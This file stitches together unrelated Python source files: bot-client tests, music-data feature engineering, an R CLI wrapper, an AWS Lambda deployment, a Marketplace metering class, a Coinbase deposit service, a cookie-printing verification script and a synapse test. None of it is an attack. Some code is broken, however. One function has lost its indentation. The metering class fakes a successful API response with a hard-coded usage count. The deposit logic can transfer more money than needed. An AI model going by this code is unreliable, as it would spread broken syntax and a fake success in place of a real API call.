class MockRunningEventBotClient(EventBotClient):
    """EventBotClient stub that records which run-loop hooks were invoked."""

    def __init__(self, id, argument_parser=None):
        super(MockRunningEventBotClient, self).__init__(id, argument_parser)
        # Flags flipped by the corresponding hooks below.
        self.prior = False
        self.ran = False
        self.post = False

    def get_client_configuration(self):
        return ClientConfigurationData("events")

    def load_license_keys(self):
        pass

    def prior_to_run_loop(self):
        self.prior = True

    def wait_and_answer(self):
        self.ran = True

    def post_run_loop(self):
        self.post = True
class EventBotClientTests(unittest.TestCase):
    """Tests for EventBotClient: abstract enforcement and run-loop hook ordering."""

    def test_init_raw(self):
        # The abstract base class must refuse direct instantiation.
        args = MockArgumentParser()
        with self.assertRaises(NotImplementedError):
            EventBotClient("testevents", args)

    def test_init_actual(self):
        # A concrete subclass constructs, but the unimplemented hook still raises.
        args = MockArgumentParser()
        bot_client = MockEventBotClient("testevents", args)
        self.assertIsNotNone(bot_client)
        with self.assertRaises(NotImplementedError):
            bot_client.wait_and_answer()

    def test_init_running(self):
        # run() must invoke the prior / answer / post hooks.
        args = MockArgumentParser()
        bot_client = MockRunningEventBotClient("testevents", args)
        self.assertIsNotNone(bot_client)
        bot_client.run()
        self.assertTrue(bot_client.prior)
        self.assertTrue(bot_client.ran)
        self.assertTrue(bot_client.post)
|
import numpy as np
import pandas as pd
from sklearn.preprocessing import LabelEncoder

## load the data
train = pd.read_csv('../temporal_data/train_id.csv')
test = pd.read_csv('../temporal_data/test_id.csv')
song = pd.read_csv('../temporal_data/songs_id_cnt.csv')
# All (user, song) listening events from train and test combined.
data = train[['msno', 'song_id']].append(test[['msno', 'song_id']])
print('Data loaded.')

## isrc process
# ISRC layout: positions 0-2 = country code (cc), 2-5 = registrant code (xxx),
# 5-7 = two-digit year (yy).
isrc = song['isrc']
song['cc'] = isrc.str.slice(0, 2)
song['xxx'] = isrc.str.slice(2, 5)
song['yy'] = isrc.str.slice(5, 7).astype(float)
# Two-digit year to four digits: <18 -> 20xx, otherwise 19xx.
song['yy'] = song['yy'].apply(lambda x: 2000+x if x < 18 else 1900+x)
# Label-encode on str so missing ISRCs ('nan') get code 0.
song['cc'] = LabelEncoder().fit_transform(song['cc'].astype(str))
song['xxx'] = LabelEncoder().fit_transform(song['xxx'].astype(str))
song['isrc_missing'] = (song['cc'] == 0) * 1.0

## song_cnt
# Count of songs per country code
song_cc_cnt = song.groupby(by='cc').count()['song_id'].to_dict()
song_cc_cnt[0] = None
song['cc_song_cnt'] = song['cc'].apply(lambda x: song_cc_cnt[x] if not np.isnan(x) else None)
# Count of songs per registrant (publisher) code
song_xxx_cnt = song.groupby(by='xxx').count()['song_id'].to_dict()
song_xxx_cnt[0] = None
song['xxx_song_cnt'] = song['xxx'].apply(lambda x: song_xxx_cnt[x] if not np.isnan(x) else None)
# Count of songs per release year
song_yy_cnt = song.groupby(by='yy').count()['song_id'].to_dict()
song_yy_cnt[0] = None
song['yy_song_cnt'] = song['yy'].apply(lambda x: song_yy_cnt[x] if not np.isnan(x) else None)
data = data.merge(song, on='song_id', how='left')
# Number of listening records per country code
# NOTE(review): direct dict indexing (song_cc_cnt[x]) raises KeyError for codes
# present in `song` but absent from `data` — confirm every code appears in data.
song_cc_cnt = data.groupby(by='cc').count()['msno'].to_dict()
song_cc_cnt[0] = None
song['cc_rec_cnt'] = song['cc'].apply(lambda x: song_cc_cnt[x] if not np.isnan(x) else None)
# Number of listening records per registrant code
song_xxx_cnt = data.groupby(by='xxx').count()['msno'].to_dict()
song_xxx_cnt[0] = None
song['xxx_rec_cnt'] = song['xxx'].apply(lambda x: song_xxx_cnt[x] if not np.isnan(x) else None)
# Number of listening records per release year
song_yy_cnt = data.groupby(by='yy').count()['msno'].to_dict()
song_yy_cnt[0] = None
song['yy_rec_cnt'] = song['yy'].apply(lambda x: song_yy_cnt[x] if not np.isnan(x) else None)

## to_csv
# Log-compress all count features before saving.
features = ['cc_song_cnt', 'xxx_song_cnt', 'yy_song_cnt', 'cc_rec_cnt', 'xxx_rec_cnt', 'yy_rec_cnt']
for feat in features:
    song[feat] = np.log1p(song[feat])
# Drop the raw 'name' and 'isrc' columns
song.drop(['name', 'isrc'], axis=1, inplace=True)
song.to_csv('../temporal_data/songs_id_cnt_isrc.csv', index=False)
|
# Lifetime (in seconds) of the access token issued while binding a user account.
BIND_USER_ACCESS_TOKEN_EXPIRES = 10 * 60
#!/usr/bin/env python
"""
This file enables the python-fire based commandline interface.
"""
from .module import RModule
from .package import RPackage
def rcli(path_module_or_package):
    """Commandline interface to R packages and functions in a file.

    Examples:
    ---------
    # with a package
    rcli utils install_packages ggplot2

    # with a file
    rcli path/test.r some_function
    """
    # Prefer interpreting the argument as an R file; fall back to a package.
    try:
        component = RModule(path_module_or_package)
    except ImportError:
        try:
            component = RPackage(path_module_or_package)
        except ImportError:
            raise ImportError(f'{path_module_or_package} not found.')
    # needs to be initialised to work with fire
    component._initialise()
    return component
def _rcli():
try:
from fire import Fire
except ModuleNotFoundError:
raise ModuleNotFoundError(
'The commandline interface requires python-fire. (pip install fire)'
)
Fire(rcli)
return
# Script entry point: delegate to the fire-based CLI wrapper.
if __name__ == "__main__":
    _rcli()
|
# -*- coding: utf-8 -*-
from .configuration import (
cutoff_config,
cutoff_config_ecoinvent_row,
consequential_config,
)
from .filesystem import (
cache_data,
OutputDir,
save_intermediate_result,
save_specific_dataset,
)
from .io import extract_directory
from .logger import create_log, create_detailed_log
from .report import HTMLReport
from .results import SaveStrategy
from .utils import get_function_meta, validate_configuration
from collections.abc import Iterable, Sequence
import itertools
import logging
import shutil
import sys
import wrapt
logger = logging.getLogger('ocelot')
# Maps the string names accepted by ``system_model(config=...)`` to their
# corresponding configuration objects.
mapping = {
    'cutoff': cutoff_config,
    'cutoff_ecoinvent_row': cutoff_config_ecoinvent_row,
    'consequential': consequential_config,
}
def apply_transformation(function, counter, data, output_dir, save_strategy, follow):
    """Apply one transformation function (or a list of them) to ``data``.

    Logs start/end metadata around each function, optionally saves the
    intermediate result (per ``save_strategy``), and saves the followed
    dataset when ``follow`` is given. Returns the transformed data.
    """
    # A `function` can be a list of functions
    if (isinstance(function, Iterable)
        and not isinstance(function, wrapt.FunctionWrapper)):
        for obj in function:
            # Fix: `follow` was previously dropped in this recursive call,
            # so passing a list of functions raised TypeError
            # (missing positional argument 'follow').
            data = apply_transformation(obj, counter, data,
                                        output_dir, save_strategy, follow)
        return data
    else:
        metadata = get_function_meta(function)
        index = next(counter)
        metadata.update(
            index=index,
            type="function start",
            count=len(data),
        )
        logger.info(metadata)
        print("Applying transformation {}".format(metadata['name']))
        data = function(data)
        metadata.update(
            type="function end",
            count=len(data)
        )
        if save_strategy(index):
            save_intermediate_result(output_dir, index, data, metadata['name'])
        if follow:
            save_specific_dataset(output_dir, index, data,
                                  follow, metadata['name'])
        logger.info(metadata)
        return data
def system_model(data_path, config=None, show=False, use_cache=True,
                 save_strategy=None, follow=None):
    """A system model is a set of assumptions and modeling choices that define how to take a list of unlinked and unallocated datasets, and transform these datasets into a new list of datasets which are linked and each have a single reference product.

    The system model itself is a list of functions. The definition of this list - which functions are included, and in which order - is defined by the input parameter ``config``, which can be a list of functions or a :ref:`configuration` object. The ``system_model`` does the following:

    * Extract data from the input data sources
    * Initialize a :ref:`logger` object
    * Then, for each transformation function in the provided configuration:
        * Log the transformation function start
        * Apply the transformation function
        * Save the intermediate data state
        * Log the transformation function end
    * Finally, write a report.

    Can be interrupted with CTRL-C. Interrupting will delete the partially completed report.

    Args:
        * ``datapath``: Filepath to directory of undefined dataset files.
        * ``config``: System model choice. Default is cutoff system model.
        * ``show``: Boolean flag to open the final report in a web browser after model completion.
        * ``use_cache``: Boolean flag to use cached data instead of raw ecospold2 files when possible.
        * ``save_strategy``: Optional input argument to initialize a ``SaveStrategy``.
        * ``follow``: Optional filename of a file to follow (i.e. save after each transformation function) during system model execution.

    Returns:
        * An ``OutputDir`` object which tells you where the report was generated
        * The final version of the data in a list
    """
    print("Starting Ocelot model run")
    # Resolve string config names through the module-level `mapping`;
    # fall back to the cutoff system model when nothing is given.
    if isinstance(config, str) and config in mapping:
        config = mapping[config]
    elif not config:
        config = cutoff_config
    config = validate_configuration(config)
    data = extract_directory(data_path, use_cache)
    output_manager = OutputDir(follow=follow)
    try:
        # `counter` numbers the transformation functions across the whole run.
        counter = itertools.count()
        logfile_path = create_log(output_manager.directory)
        create_detailed_log(output_manager.directory)
        print("Opening log file at: {}".format(logfile_path))
        logger.info({
            'type': 'report start',
            'uuid': output_manager.report_id,
            'count': len(data),
        })
        save_strategy = SaveStrategy(save_strategy)
        for obj in config:
            data = apply_transformation(obj, counter, data,
                                        output_manager.directory,
                                        save_strategy, follow)
        print("Saving final results")
        save_intermediate_result(output_manager.directory, "final-results", data)
        logger.info({'type': 'report end'})
        print(("Compare results with: ocelot-compare compare {} "
               "<reference results>").format(output_manager.report_id))
        HTMLReport(logfile_path, show)
        return output_manager, data
    except KeyboardInterrupt:
        # CTRL-C: remove the partially-written report directory and exit.
        print("Terminating Ocelot model run")
        print("Deleting output directory:\n{}".format(output_manager.directory))
        shutil.rmtree(output_manager.directory)
        sys.exit(1)
|
import json
from time import time
import pulumi
import pulumi_aws
from pulumi_aws import apigateway, lambda_, s3
# S3 bucket holding the pretrained model archive downloaded by the Lambda at runtime.
model_bucket = s3.Bucket("modelBucket")
model_object = s3.BucketObject("model",
    bucket=model_bucket,
    # The model comes from the pretrained model referenced in https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py
    # Then, converted per https://github.com/pytorch/vision/issues/2068 (see convert.py)
    # It's combined with labels.txt in a tgz.
    source=pulumi.FileAsset("./model.tar.gz"))
# Trust policy allowing the Lambda service to assume the execution role.
instance_assume_role_policy = pulumi_aws.iam.get_policy_document(statements=[{
    "actions": ["sts:AssumeRole"],
    "principals": [{
        "identifiers": ["lambda.amazonaws.com"],
        "type": "Service",
    }],
}])
role = pulumi_aws.iam.Role("classifier-fn-role",
    assume_role_policy=instance_assume_role_policy.json,
)
# Execution-role permissions: logging/metrics plus read access to the model bucket.
policy = pulumi_aws.iam.RolePolicy("classifier-fn-policy",
    role=role,
    policy=pulumi.Output.from_input({
        "Version": "2012-10-17",
        "Statement": [{
            "Action": ["logs:*", "cloudwatch:*"],
            "Resource": "*",
            "Effect": "Allow",
        }, {
            "Action": ["s3:*"],
            "Resource": model_bucket.arn.apply(lambda b: f"{b}/*"),
            "Effect": "Allow",
        }],
    }),
)
# The classifier Lambda: code from ./app, PyTorch supplied via a prebuilt layer,
# model location passed through environment variables.
lambda_func = lambda_.Function("classifier-fn",
    code=pulumi.AssetArchive({
        ".": pulumi.FileArchive("./app"),
    }),
    role=role.arn,
    timeout=300,
    memory_size=512,
    runtime="python3.6",
    handler="app.lambda_handler",
    layers=["arn:aws:lambda:us-west-2:934676248949:layer:pytorchv1-py36:2"],
    environment={
        "variables": {
            "MODEL_BUCKET": model_bucket.bucket,
            "MODEL_KEY": model_object.key,
        }
    }
)
# The stage name to use for the API Gateway URL
custom_stage_name = "api"

# Create the Swagger spec for a proxy which forwards all HTTP requests through to the Lambda function.
def swagger_spec(lambda_arn):
    """Return a JSON Swagger document routing every path to the given Lambda."""
    return json.dumps({
        "swagger": "2.0",
        "info": {"title": "api", "version": "1.0"},
        "paths": {"/{proxy+}": swagger_route_handler(lambda_arn)},
    })
# Create a single Swagger spec route handler for a Lambda function.
def swagger_route_handler(lambda_arn):
    """Return the x-amazon-apigateway ANY-method stanza that proxies to *lambda_arn*."""
    invoke_uri = ("arn:aws:apigateway:{region}:lambda:path/2015-03-31"
                  "/functions/{lambdaArn}/invocations").format(
                      region=pulumi_aws.config.region, lambdaArn=lambda_arn)
    return {
        "x-amazon-apigateway-any-method": {
            "x-amazon-apigateway-integration": {
                "uri": invoke_uri,
                "passthroughBehavior": "when_no_match",
                "httpMethod": "POST",
                "type": "aws_proxy",
            },
        },
    }
# Create the API Gateway Rest API, using a swagger spec.
rest_api = apigateway.RestApi("api",
    body=lambda_func.arn.apply(lambda lambda_arn: swagger_spec(lambda_arn)),
)
# Create a deployment of the Rest API.
deployment = apigateway.Deployment("api-deployment",
    rest_api=rest_api,
    # Note: Set to empty to avoid creating an implicit stage, we'll create it
    # explicitly below instead.
    stage_name="")
# Create a stage, which is an addressable instance of the Rest API. Set it to point at the latest deployment.
stage = apigateway.Stage("api-stage",
    rest_api=rest_api,
    deployment=deployment,
    stage_name=custom_stage_name,
)
# Give permissions from API Gateway to invoke the Lambda
# NOTE(review): the documented action name is "lambda:InvokeFunction" —
# confirm the lowercase spelling is accepted by the provider in use.
invoke_permission = lambda_.Permission("api-lambda-permission",
    action="lambda:invokeFunction",
    function=lambda_func,
    principal="apigateway.amazonaws.com",
    source_arn=deployment.execution_arn.apply(
        lambda execution_arn: execution_arn + "*/*"),
)
# Export the https endpoint of the running Rest API
pulumi.export("endpoint", deployment.invoke_url.apply(lambda url: url + custom_stage_name))
|
#!/usr/bin/python
import json
import logging
import os
import sys
import threading
from datetime import datetime
from decimal import Decimal
from time import sleep
import boto3
import pytz
from botocore.exceptions import ClientError
logger = logging.getLogger(__name__)
# boto3 service name used to create the AWS Marketplace Metering Service client.
BOTO3_METERING_MARKETPLACE_CLIENT = 'meteringmarketplace'
class MeterUsageIntegration:
    """Periodically reports product usage dimensions to the AWS Marketplace
    Metering Service (MMS), tracking send failures in a ``State`` object.
    """

    # Seconds between metering runs; overridable via SEND_DIMENSIONS_AFTER.
    try:
        _SEND_DIMENSIONS_AFTER = int(os.getenv("SEND_DIMENSIONS_AFTER", default=3600))
    except ValueError:
        _SEND_DIMENSIONS_AFTER = 3600

    # Initializes the integration and starts a thread to send the metering
    # information to AWS Marketplace
    def __init__(self,
                 region_name,
                 product_code,
                 max_send_stop=2,
                 max_send_warning=1):
        self._product_code = product_code
        self._max_send_stop = max_send_stop
        self._max_send_warning = max_send_warning
        self.state = State(max_send_stop, max_send_warning,
                           self._SEND_DIMENSIONS_AFTER)
        self._mms_client = boto3.client(BOTO3_METERING_MARKETPLACE_CLIENT,
                                        region_name=region_name)
        self._initializing = True
        try:
            self._check_connectivity_and_dimensions()
        except ClientError as err:
            # A failed dry-run marks the integration as unable to start.
            self.state.type = "init"
            self.state.add_error(err)
            logger.error(err)
        except Exception:
            # Fix: was a bare `except:`, which also swallowed
            # SystemExit/KeyboardInterrupt.
            self.state.type = "init"
            self.state.add(f"{sys.exc_info()[1]}")
            logger.error(f"{sys.exc_info()[1]}")
        t = threading.Thread(target=self.run)
        t.start()

    def run(self):
        """Background loop: meter usage, refresh state, then sleep."""
        logger.info("Initializing")
        if self.state.type != "init":
            while True:
                self.meter_usages()
                self.update_state()
                if self.state.type == "stop":
                    message = f"The usage couldn't be sent after {self._max_send_stop} tries. Please check that your product has a way to reach the internet."
                    self.state.add(message)
                    logger.error(message)
                logger.info("Going to sleep")
                sleep(self._SEND_DIMENSIONS_AFTER)

    def get_consumption(self):
        """ Returns all the dimensions from the AAP Controller unique host table """
        # NOTE(review): quantity is currently hard-coded to 10 — confirm this
        # placeholder is replaced by the real unique-host count.
        dim_timestamp = datetime.utcnow().timestamp()
        dim_timestamp_int = int(dim_timestamp)
        dim_datetime = datetime.fromtimestamp(dim_timestamp).isoformat()
        return {
            "dimensions": [
                {
                    "name": "aap-unique-hosts",
                    "quantity": 10,
                    "timestamp": dim_timestamp_int,
                    "datetime": dim_datetime
                }
            ]
        }

    def get_state(self):
        """ Returns the state """
        return {"state": self.state}

    def meter_usages(self, dry_run=False):
        """ Obtain unique host count and sends it to Marketplace Metering Service (MMS) using the meter_usage method. """
        logger.info(f"meter_usages: dry_run={dry_run}")
        responses = []
        for d in self.get_consumption().get("dimensions", []):
            # If you call meter_usage at start time with 0 as quantity,
            # you won't be able to send another a different quantity for the first hour.
            # Dimensions can only be reported once per hour.
            # We are avoiding this problem here
            if (dry_run):
                responses += [self._meter_usage(dimension=d, dry_run=dry_run)]
            else:
                if not (self._initializing and d.get("quantity", 0) == 0):
                    responses += [
                        self._meter_usage(dimension=d, dry_run=dry_run)
                    ]
        if (self._initializing):
            logger.info("setting _initializing to False")
            self._initializing = False
        return responses

    def get_status(self):
        """Gets the state of the integration component and the consumption (number of unique hosts) that hasn't been sent to the metering service yet"""
        return {
            "version": "1.0.0",
            "consumption": self.get_consumption(),
            "state": self.get_state()
        }

    def update_state(self):
        """Refresh the failure state based on the newest dimension timestamp."""
        get_latest_dimensions = self.get_consumption().get("dimensions", [])
        for d in get_latest_dimensions:
            if d.get("timestamp"):
                self.state.update_type(d.get("timestamp"))
                break

    def _check_connectivity_and_dimensions(self):
        """ Checks the connectivity and the dimensions given sending a dry_run call to the Marketplace Metering Service """
        self.meter_usages(dry_run=True)

    # Send the given dimension and quantity to Marketplace Metering Serverice
    # using the meter_usage method. If the dimension is sent successfully,
    # the quantity for the dimension is reset to 0 in the DB
    # (Only if dry_run is false)
    def _meter_usage(self, dimension, dry_run=False):
        logger.info(f"_metering_usage: {dimension} ")
        utc_now = datetime.utcnow()
        try:
            # NOTE(review): the real MMS call is commented out and replaced by
            # a stubbed 200 response — confirm before shipping.
            # response = self._mms_client.meter_usage(
            #     ProductCode=self._product_code,
            #     Timestamp=utc_now,
            #     UsageDimension=dimension.get("name"),
            #     UsageQuantity=int(dimension.get("quantity")),
            #     DryRun=dry_run)
            print(f"ProductCode: {self._product_code}, Timestamp:{utc_now}, UsageDimension: {dimension.get('name')}, UsageQuantity: {int(dimension.get('quantity'))}")
            response = {
                "ResponseMetadata": {
                    "HTTPStatusCode": 200
                }
            }
            status_code = response["ResponseMetadata"]["HTTPStatusCode"]
            if (not dry_run and status_code == 200):
                # A successful send clears previous errors for this dimension.
                self.state.discard_dimension_errors(dimension.get("name"))
            return response
        except ClientError as err:
            if (dry_run):
                raise
            self.state.add_error(err)
            logger.error(err)
        except Exception:
            # Fix: was a bare `except:` (see __init__).
            if (dry_run):
                raise
            self.state.add(f"{sys.exc_info()[1]}")
            logger.error(f"{sys.exc_info()[1]}")
class State():
    """Health of the metering loop: a set of error details plus a type flag
    ("", "warning", "stop", or "init") derived from how stale the last
    successfully reported dimension timestamp is.
    """

    def __init__(self,
                 max_send_stop,
                 max_send_warning,
                 send_usage_after,
                 detail=None):
        self.max_send_stop = max_send_stop
        self.max_send_warning = max_send_warning
        # Avoid a shared mutable default: only build a fresh set when none given.
        self.details = set() if detail is None else detail
        self.type = ""
        self._send_usage_after = send_usage_after

    def update_type(self, max_timestamp):
        """Reclassify based on the age of *max_timestamp* (epoch seconds)."""
        if self.type == "init":
            return
        now = datetime.utcnow().timestamp()
        stop_cutoff = now - self.max_send_stop * self._send_usage_after
        warning_cutoff = now - self.max_send_warning * self._send_usage_after
        if max_timestamp <= stop_cutoff:
            self.type = "stop"
        elif max_timestamp <= warning_cutoff:
            self.type = "warning"
        else:
            # Fresh enough: clear the flag and all accumulated details.
            self.type = ""
            self.details = set()

    def add(self, detail):
        self.details.add(detail)

    def value(self):
        """True when any error detail is recorded."""
        return len(self.details) > 0

    def add_error(self, error):
        """Record a botocore ClientError as "Code: Message"."""
        info = error.response["Error"]
        self.add(info["Code"] + ": " + info["Message"])

    def discard_dimension_errors(self, dimension_name):
        """Drop all details mentioning *dimension_name*; reset type when empty."""
        marker = f"usageDimension: {dimension_name}"
        for detail in self.details.copy():
            if marker in detail:
                self.details.discard(detail)
        if not self.details:
            self.type = ""
# Module-level singleton; fix: removed a stray trailing artifact that made the
# line invalid Python.
# NOTE(review): this starts the metering thread as a side effect of importing
# the module — confirm that is intended.
mui = MeterUsageIntegration(region_name="us-east-1", product_code="aap")
import json
import math
import time
from typing import Union
import coinbasepro
from cbpa.logger import logger
from cbpa.schemas.account import AddFundsResponse
from cbpa.schemas.config import Config
from cbpa.schemas.currency import CCC, FCC
from cbpa.services.discord import DiscordService
class AccountService:
    """Wraps a Coinbase Pro client for balance lookups, payment-method lookup
    and fiat deposits, posting Discord alerts along the way.
    """

    def __init__(
        self, config: Config, coinbasepro_client: coinbasepro.AuthenticatedClient
    ) -> None:
        self.coinbasepro_client = coinbasepro_client
        self.config = config
        self.discord = DiscordService()

    def get_balance_for_currency(self, currency: Union[CCC, FCC]) -> int:
        """get_balance_for_currency
        Assuming there will only ever be one account for a currency identifier.
        This account is not the same as a payment method.
        Think of it as just the allocation of a currency.
        """
        # NOTE(review): raises IndexError when no account matches the
        # currency — confirm upstream guarantees one always exists.
        return [
            math.floor(account["balance"])
            for account in self.coinbasepro_client.get_accounts()
            if account["currency"] == currency.value
        ][0]

    def get_primary_buy_payment_method_id(self, fiat: FCC) -> str:
        """Return the id of the primary-buy payment method for *fiat*."""
        # NOTE(review): also IndexError-prone if no primary-buy method exists
        # for this currency.
        return [
            primary_method["id"]
            for primary_method in self.coinbasepro_client.get_payment_methods()
            if primary_method["primary_buy"]
            and primary_method["currency"] == fiat.value
        ][0]

    def add_funds(
        self,
        buy_total: int,
        current_funds: int,
        max_fund: int,
        fiat: FCC,
    ) -> AddFundsResponse:
        """Deposit enough fiat to cover *buy_total*, respecting the *max_fund* limit.

        Returns an AddFundsResponse with status "Error" when the limit is
        exceeded or no payment method id is found, "Success" otherwise.
        """
        if buy_total > max_fund:
            message = (
                f"Total cost is {buy_total} {fiat} but you "
                f"have your limit set to {max_fund} {fiat}. "
                "Unable to complete purchase. "
                "Update your settings appropriately to make changes if necessary."
            )
            self.discord.send_alert(config=self.config, message=message)
            return AddFundsResponse(status="Error", message=message)
        else:
            fund_amount = buy_total - current_funds
            # NOTE(review): with any existing balance above 1, the full
            # max_fund is deposited instead of just the shortfall — confirm
            # this behavior is intended.
            if current_funds > 1:
                fund_amount = max_fund
            fund_message = (
                f"Your balance is {current_funds} {fiat}. "
                f"A deposit of {fund_amount} {fiat} will be made "
                "using your selected payment account."
            )
            logger.info(fund_message)
            self.discord.send_alert(config=self.config, message=fund_message)
            payment_id = self.get_primary_buy_payment_method_id(fiat=fiat)
            if payment_id is None:
                return AddFundsResponse(
                    status="Error", message="Could not determine payment account id."
                )
            else:
                deposit = self.coinbasepro_client.deposit(
                    amount=fund_amount,
                    currency=fiat.value,
                    payment_method_id=payment_id,
                )
                # Give the deposit time to settle before any follow-up purchase.
                logger.info("Sleeping for 10 seconds while the deposit completes.")
                time.sleep(10)
                return AddFundsResponse(
                    status="Success",
                    message=json.dumps(deposit, sort_keys=True, default=str),
                )
|
'''
Author : Shreyak Upadhyay
Email : shreyakupadhyay07@gmail.com
Subject : get verified for target website .
Description:
send a get request to get verified for the target website.
'''
import logging
import requests
import re
import os
import sys
import time
from bs4 import BeautifulSoup
import json
logging.basicConfig(level=logging.DEBUG)
s = requests.Session()
def getVerified(LinkVerify, cookie_key="uid", dashboard_url=None):
    """Visit a verification link and optionally the post-verification page.

    BUG FIX: the original contained placeholder pseudo-code
    (``[key to the cookies]`` and ``s.get(Link after verification, ...)``)
    that was not valid Python; both placeholders are now parameters with
    backward-compatible defaults.

    :param LinkVerify: verification URL (e.g. received by mail).
    :param cookie_key: name of the session cookie identifying the user.
    :param dashboard_url: page you are redirected to after authentication;
        skipped when None.
    :return: the cookie value found under *cookie_key*, or None.
    """
    headers = {
        "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "accept-encoding": "gzip, deflate, sdch, br",
        "accept-language": "en-US,en;q=0.8",
        # "upgrade-insecure-requests": "1",
        "user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
    }
    response = s.get(LinkVerify, headers=headers)
    responseCookies = response.cookies
    print(responseCookies)
    # Useful when cookies are stored on the session rather than the response.
    uid = requests.utils.dict_from_cookiejar(s.cookies).get(cookie_key)
    print(uid)
    dash_headers = {
        # NOTE(review): these look like *response* headers replayed as request
        # headers; most are ignored by servers.  The original dict literal also
        # duplicated "cache-control" -- only the last duplicate key survives in
        # a Python dict, so just that one is kept here.
        "cache-control": "no-cache",
        "cf-ray": "2e5c0ada1b242dc7-BOM",
        "content-encoding": "gzip",
        "content-type": "text/html; charset=UTF-8",
        "date": "Wed, 21 Sep 2016 08:10:45 GMT",
        "server": "cloudflare-nginx",
        "set-cookie": str(responseCookies),
        "status": "200",
        "vary": "Accept-Encoding",
        "x-mod-pagespeed": "1.11.33.2-0",
        "x-powered-by": "PHP/5.6.24"
    }
    # Follow through to the post-authentication page when one was given.
    if dashboard_url is not None:
        response_dash = s.get(dashboard_url, headers=dash_headers)
        print(response_dash.text)
    return uid
getVerified(sys.argv[1]) |
from datetime import datetime
import os
import config.constants as constants
def resolve_survey_id_from_file_name(name):
    """Return the survey id parsed out of an S3-style object *name*.

    Thin wrapper over :func:`parse_filename`; raises KeyError when the
    parsed name carries no ``survey_id`` (see parse_filename).
    """
    return parse_filename(name)['survey_id']
def parse_filename(filename):
    """
    Parse filename into dictionary that reflects different properties of its corrsponding object,
    such as datatype and date of acquisition.

    The path layout (split on '/') is described by the constants.*_PATH_MAPPING
    index tables; which table applies is inferred from marker folders in the path.
    """
    filename = filename.rstrip()
    file_object_dict = {'filename': filename}
    file_values_list = filename.split('/')
    # try to resolve whether it is a 'new' format or an 'old' format and handle approporiately
    name, ext = os.path.splitext(os.path.basename(filename))
    if ext and ext[0] == '.':
        ext = ext[1:]  # drop the leading dot
    if not ext:
        # Extensionless objects are registration markers.
        file_object_dict["file_type"] = constants.REGISTRATION_MARKER
    elif ext in constants.ALLOWED_EXTENSIONS:
        file_object_dict["file_extension"] = ext
        # chunk data is always obvious, so lets start with that
        if constants.CHUNKS_FOLDER in filename:
            file_object_dict['file_type'] = constants.CHUNK_DATA
            index_mapping = constants.CHUNK_PATH_MAPPING
        else:
            file_object_dict['file_type'] = constants.RAW_DATA
            if constants.RAW_DATA_FOLDER in filename:
                index_mapping = constants.NEW_RAW_PATH_MAPPING
            else:
                index_mapping = constants.OLD_RAW_PATH_MAPPING
        file_object_dict['study_object_id'] = file_values_list[index_mapping['STUDY_ID_INDEX']]
        file_object_dict['patient_id'] = file_values_list[index_mapping['PATIENT_ID_INDEX']]
        if constants.IDENTIFIERS in file_values_list[index_mapping['DATA_TYPE_INDEX']]:
            file_object_dict['data_type'] = constants.IDENTIFIERS
            # [:-4] strips what is presumably a 4-char ".xxx" suffix -- TODO confirm.
            file_object_dict['datetime'] = file_values_list[index_mapping['DATA_TYPE_INDEX']].split('_')[-1][:-4]
        else:
            file_object_dict['datetime'] = file_values_list[index_mapping["FILE_NAME_INDEX"]].split('_')[-1][:-4]
            if 'ios' in file_values_list[index_mapping['DATA_TYPE_INDEX']]:
                file_object_dict['data_type'] = constants.IOS_LOG_FILE
            else:
                if file_object_dict['file_type'] == constants.CHUNK_DATA:
                    # Chunked paths carry the data type verbatim.
                    file_object_dict['data_type'] = file_values_list[index_mapping['DATA_TYPE_INDEX']]
                else:
                    # Raw uploads need translation through the upload-type mapping.
                    file_object_dict['data_type'] = constants.UPLOAD_FILE_TYPE_MAPPING[file_values_list[index_mapping['DATA_TYPE_INDEX']]]
            # NOTE(review): block nesting reconstructed from a flattened dump;
            # confirm the survey-id handling sits inside this else-branch.
            if file_object_dict['data_type'] in [constants.SURVEY_ANSWERS, constants.SURVEY_TIMINGS, constants.VOICE_RECORDING, constants.IMAGE_FILE]:
                # sometimes the survey id isn't in the filename, not sure why, but lets handle it anyway
                if file_values_list[index_mapping['SURVEY_ID_INDEX']] != file_values_list[index_mapping["FILE_NAME_INDEX"]]:
                    file_object_dict['survey_id'] = file_values_list[index_mapping['SURVEY_ID_INDEX']]
                else:
                    print('Could not find a survey id for {0}'.format(filename))
                if file_object_dict['data_type'] == constants.IMAGE_FILE:
                    file_object_dict['image_survey_user_instance'] = file_values_list[index_mapping['IMAGE_SURVEY_USER_INSTANCE']]
    else:
        print('Extension is not appropriate {0}'.format(ext))
    return file_object_dict
|
from synapse.tests.common import *
import synapse.axon as s_axon
import synapse.cortex as s_cortex
import synapse.daemon as s_daemon
import synapse.neuron as s_neuron
import synapse.tools.pushfile as s_pushfile
nullhash = hashlib.sha256(b'').digest()
visihash = hashlib.sha256(b'visi').digest()
class TestPushFile(SynTest):
    """Integration test for the synapse pushfile tool."""

    def test_tools_pushfile(self):
        """Push a real file and a missing file; check cortex nodes and axon bytes."""
        with self.getAxonCore() as env:
            nullpath = os.path.join(env.dirn, 'null.txt')
            visipath = os.path.join(env.dirn, 'visi.txt')
            with open(visipath, 'wb') as fd:
                fd.write(b'visi')
            outp = self.getTestOutp()
            s_pushfile.main(['--tags', 'foo.bar,baz.faz', env.core_url, visipath], outp=outp)
            # The pushed file should surface as a tagged file:bytes node.
            node = env.core.getTufoByProp('file:bytes')
            self.eq(node[1].get('file:bytes'), '442f602ecf8230b2a59a44b4f845be27')
            self.eq(node[1].get('file:bytes:size'), 4)
            # Both explicit tags and their parent tags must be present.
            self.nn(node[1].get('#foo'))
            self.nn(node[1].get('#foo.bar'))
            self.nn(node[1].get('#baz'))
            self.nn(node[1].get('#baz.faz'))
            # Ensure the axon got the bytes
            self.eq(env.axon_client.wants((visihash,)), ())
            self.eq(list(env.axon_client.bytes(visihash))[0], b'visi')
            # Ensure user can't push a non-existant file and that it won't exist
            self.raises(FileNotFoundError, s_pushfile.main, ['--tags', 'foo.bar,baz.faz', env.core_url, nullpath], outp=outp)
            self.eq(env.axon_client.wants((nullhash,)), (nullhash,))
            # Ensure user can push an empty file
            with open(nullpath, 'wb') as fd:
                fd.write(b'')
            outp = self.getTestOutp()
            s_pushfile.main(['--tags', 'foo.bar,baz.faz', env.core_url, nullpath], outp=outp)
            node = env.core.getTufoByProp('file:bytes:sha256', ehex(nullhash))
            self.istufo(node)
